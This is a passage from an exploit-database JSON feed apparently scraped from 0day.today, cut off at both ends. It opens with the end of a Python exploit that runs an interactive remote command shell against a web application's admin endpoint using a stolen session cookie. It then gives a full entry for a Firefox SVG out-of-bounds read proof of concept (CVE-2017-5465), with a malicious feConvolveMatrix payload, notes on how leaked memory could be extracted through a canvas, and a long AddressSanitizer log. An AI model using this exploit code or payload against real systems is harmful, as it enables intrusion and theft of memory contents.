url,cookie\r\n command = raw_input('\\033[1;31mshell > \\033[1;m') \r\n if command == \"exit\":\r\n print \"goodbye\"\r\n sys.exit()\r\n \r\n headers = {\r\n 'Accept': '*/*',\r\n \"Cookie\":\"PHPSESSID=\"+cookie\r\n }\r\n data = {\"q\":command,\r\n \"mati\":\"mati\",\r\n \"language\":\"id\"\r\n }\r\n r = requests.post(url+\"/admin/index.php\", headers=headers, data=data)\r\n print r.text\r\n exploit('')\r\n \r\nlogin()\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/29018", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-03T01:34:09", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2017-05-25T00:00:00", "type": "zdt", "title": "Mozilla Firefox < 53 - ConvolvePixel Memory Disclosure Exploit", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5465"], "modified": "2017-05-25T00:00:00", "href": "https://0day.today/exploit/description/27839", "id": "1337DAY-ID-27839", "sourceData": "<!--\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1185\r\n \r\nMozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1347617\r\n \r\nThere is an out of bound read leading to memory disclosure in Firefox. The vulnerability was confirmed on the nightly ASan build. \r\n \r\nPoC:\r\n \r\n=================================================================\r\n-->\r\n \r\n<svg filter=\"url(#f)\">\r\n<filter id=\"f\" filterRes=\"19\" filterUnits=\"userSpaceOnUse\">\r\n<feConvolveMatrix kernelMatrix=\"1 1 1 1 1 1 1 1 1\" kernelUnitLength=\"1 -1\" />\r\n \r\n<!--\r\n=================================================================\r\n \r\nPreliminary analysis:\r\n \r\nThe problem seems to be the negative krenel unit length. This leads to an out of bound access in ConvolvePixel() and out-of-bounds data is going to be copied into the SVG image. From there, it can be extracted by an attacker by loading the SVG image into a canvas element.\r\n \r\nASan log:\r\n \r\n=================================================================\r\n==25524==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f8cd2946336 at pc 0x7f8d3fcd397e bp 0x7ffc051ca390 sp 0x7ffc051ca388\r\nREAD of size 1 at 0x7f8cd2946336 thread T0\r\n #0 0x7f8d3fcd397d in ColorComponentAtPoint /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10\r\n #1 0x7f8d3fcd397d in ConvolvePixel<int> /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2358\r\n #2 0x7f8d3fcd397d in already_AddRefed<mozilla::gfx::DataSourceSurface> mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender<int>(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2509\r\n #3 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12\r\n #4 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #5 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #6 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10\r\n #7 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #8 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #9 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5\r\n #10 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #11 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #12 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5\r\n #13 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #14 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #15 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5\r\n #16 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #17 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14\r\n #18 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, nsTArray<RefPtr<mozilla::gfx::SourceSurface> >&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8\r\n #19 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3\r\n #20 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19\r\n #21 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5\r\n #22 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30\r\n #23 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722\r\n #24 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray<mozilla::FrameLayerBuilder::ClippedDisplayItem>&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped<mozilla::gfx::UnknownUnits> const&, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044\r\n #25 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19\r\n #26 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray<mozilla::layers::ReadbackProcessor::Update>*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5\r\n #27 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3\r\n #28 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29\r\n #29 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29\r\n #30 0x7f8d4002fcb7 in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:358:13\r\n #31 0x7f8d40030527 in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:411:3\r\n #32 0x7f8d44ff4b51 in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:2253:17\r\n #33 0x7f8d447e7554 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&, unsigned int, nsDisplayListBuilderMode, nsLayoutUtils::PaintFrameFlags) /home/worker/workspace/build/src/layout/base/nsLayoutUtils.cpp:3714:12\r\n #34 0x7f8d446eaf2a in mozilla::PresShell::Paint(nsView*, nsRegion const&, unsigned int) /home/worker/workspace/build/src/layout/base/PresShell.cpp:6489:5\r\n #35 0x7f8d43f4cff4 in nsViewManager::ProcessPendingUpdatesPaint(nsIWidget*) /home/worker/workspace/build/src/view/nsViewManager.cpp:483:19\r\n #36 0x7f8d43f4c54f in nsViewManager::ProcessPendingUpdatesForView(nsView*, bool) /home/worker/workspace/build/src/view/nsViewManager.cpp:415:33\r\n #37 0x7f8d43f4faed in nsViewManager::ProcessPendingUpdates() /home/worker/workspace/build/src/view/nsViewManager.cpp:1104:5\r\n #38 0x7f8d44648596 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2031:11\r\n #39 0x7f8d44654553 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7\r\n #40 0x7f8d44654224 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5\r\n #41 0x7f8d446569c5 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5\r\n #42 0x7f8d446569c5 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624\r\n #43 0x7f8d44656bfe in applyImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef<mozilla::TimeStamp> , 0> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12\r\n #44 0x7f8d44656bfe in apply<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861\r\n #45 0x7f8d44656bfe in mozilla::detail::RunnableMethodImpl<mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver*, void (mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::*)(mozilla::TimeStamp), true, false, mozilla::TimeStamp>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890\r\n #46 0x7f8d3e06238c in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14\r\n #47 0x7f8d3e05ecb8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10\r\n #48 0x7f8d3ee06e21 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21\r\n #49 0x7f8d3ed67980 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10\r\n #50 0x7f8d3ed67980 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231\r\n #51 0x7f8d3ed67980 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211\r\n #52 0x7f8d43fc682f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27\r\n #53 0x7f8d474273c1 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:30\r\n #54 0x7f8d475e78ca in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4492:22\r\n #55 0x7f8d475e9353 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4670:8\r\n #56 0x7f8d475ea6dc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4761:21\r\n #57 0x4eb2b3 in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:22\r\n #58 0x4eb2b3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307\r\n #59 0x7f8d5914d82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291\r\n #60 0x41ce08 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41ce08)\r\n \r\n0x7f8cd2946336 is located 1226 bytes to the left of 162639-byte region [0x7f8cd2946800,0x7f8cd296e34f)\r\nallocated by thread T0 here:\r\n #0 0x4bb873 in calloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:72:3\r\n #1 0x7f8d3fd5a936 in Realloc /home/worker/workspace/build/src/gfx/2d/Tools.h:179:41\r\n #2 0x7f8d3fd5a936 in mozilla::gfx::SourceSurfaceAlignedRawData::Init(mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SurfaceFormat, bool, unsigned char, int) /home/worker/workspace/build/src/gfx/2d/SourceSurfaceRawData.cpp:66\r\n #3 0x7f8d3fc40c98 in mozilla::gfx::Factory::CreateDataSourceSurface(mozilla::gfx::IntSizeTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SurfaceFormat, bool) /home/worker/workspace/build/src/gfx/2d/Factory.cpp:878:16\r\n #4 0x7f8d3fcb1bd7 in mozilla::gfx::GetDataSurfaceInRect(mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::ConvolveMatrixEdgeMode) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:434:5\r\n #5 0x7f8d3fcb8903 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:753:15\r\n #6 0x7f8d3fcd0d8d in already_AddRefed<mozilla::gfx::DataSourceSurface> mozilla::gfx::FilterNodeConvolveMatrixSoftware::DoRender<int>(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, int, int) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2460:5\r\n #7 0x7f8d3fcd089a in mozilla::gfx::FilterNodeConvolveMatrixSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2379:12\r\n #8 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #9 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #10 0x7f8d3fce4035 in mozilla::gfx::FilterNodeCropSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3140:10\r\n #11 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #12 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #13 0x7f8d3fce4895 in mozilla::gfx::FilterNodeUnpremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3197:5\r\n #14 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #15 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #16 0x7f8d3fcc7832 in mozilla::gfx::FilterNodeComponentTransferSoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:1781:5\r\n #17 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #18 0x7f8d3fcb85d9 in mozilla::gfx::FilterNodeSoftware::GetInputDataSourceSurface(unsigned int, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::FilterNodeSoftware::FormatHint, mozilla::gfx::ConvolveMatrixEdgeMode, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:728:25\r\n #19 0x7f8d3fce4685 in mozilla::gfx::FilterNodePremultiplySoftware::Render(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:3168:5\r\n #20 0x7f8d3fcb0be2 in mozilla::gfx::FilterNodeSoftware::GetOutput(mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:627:21\r\n #21 0x7f8d3fc7cb43 in mozilla::gfx::FilterNodeSoftware::Draw(mozilla::gfx::DrawTarget*, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:580:14\r\n #22 0x7f8d3fd8bc6e in mozilla::gfx::FilterSupport::RenderFilterDescription(mozilla::gfx::DrawTarget*, mozilla::gfx::FilterDescription const&, mozilla::gfx::RectTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::SourceSurface*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, nsTArray<RefPtr<mozilla::gfx::SourceSurface> >&, mozilla::gfx::PointTyped<mozilla::gfx::UnknownUnits, float> const&, mozilla::gfx::DrawOptions const&) /home/worker/workspace/build/src/gfx/src/FilterSupport.cpp:1360:8\r\n #23 0x7f8d44ccc3fd in nsFilterInstance::Render(mozilla::gfx::DrawTarget*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:545:3\r\n #24 0x7f8d44ccb7ee in nsFilterInstance::PaintFilteredFrame(nsIFrame*, mozilla::gfx::DrawTarget*, gfxMatrix const&, nsSVGFilterPaintCallback*, nsRegion const*) /home/worker/workspace/build/src/layout/svg/nsFilterInstance.cpp:81:19\r\n #25 0x7f8d44d09f72 in nsSVGIntegrationUtils::PaintFilter(nsSVGIntegrationUtils::PaintFramesParams const&) /home/worker/workspace/build/src/layout/svg/nsSVGIntegrationUtils.cpp:1094:5\r\n #26 0x7f8d44f7e9bd in PaintAsLayer /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:8330:30\r\n #27 0x7f8d44f7e9bd in PaintInactiveLayer /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:3722\r\n #28 0x7f8d44f7e9bd in mozilla::FrameLayerBuilder::PaintItems(nsTArray<mozilla::FrameLayerBuilder::ClippedDisplayItem>&, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, gfxContext*, nsRenderingContext*, nsDisplayListBuilder*, nsPresContext*, mozilla::gfx::IntPointTyped<mozilla::gfx::UnknownUnits> const&, float, float, int) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6044\r\n #29 0x7f8d44f819f2 in mozilla::FrameLayerBuilder::DrawPaintedLayer(mozilla::layers::PaintedLayer*, gfxContext*, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, mozilla::layers::DrawRegionClip, mozilla::gfx::IntRegionTyped<mozilla::gfx::UnknownUnits> const&, void*) /home/worker/workspace/build/src/layout/painting/FrameLayerBuilder.cpp:6233:19\r\n #30 0x7f8d40034966 in mozilla::layers::ClientPaintedLayer::PaintThebes(nsTArray<mozilla::layers::ReadbackProcessor::Update>*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:85:5\r\n #31 0x7f8d40035611 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) /home/worker/workspace/build/src/gfx/layers/client/ClientPaintedLayer.cpp:139:3\r\n #32 0x7f8d4006810f in mozilla::layers::ClientContainerLayer::RenderLayer() /home/worker/workspace/build/src/gfx/layers/client/ClientContainerLayer.h:57:29\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/gfx/2d/FilterNodeSoftware.cpp:2293:10 in ColorComponentAtPoint\r\nShadow bytes around the buggy address:\r\n 0x0ff21a520c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0ff21a520c60: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520c90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520ca0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0ff21a520cb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==25524==ABORTING\r\n-->\n\n# 0day.today [2018-04-03] #", "sourceHref": "https://0day.today/exploit/27839", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-02-20T03:24:07", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "reporter": "Google Security Research", "published": "2017-05-25T00:00:00", "type": "zdt", "title": "Mozilla Firefox < 53 - gfxTextRun Out-of-Bounds Read Exploit", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5447"], "modified": "2017-05-25T00:00:00", "href": "https://0day.today/exploit/description/27840", "id": "1337DAY-ID-27840", "sourceData": "<!--\r\nSource: 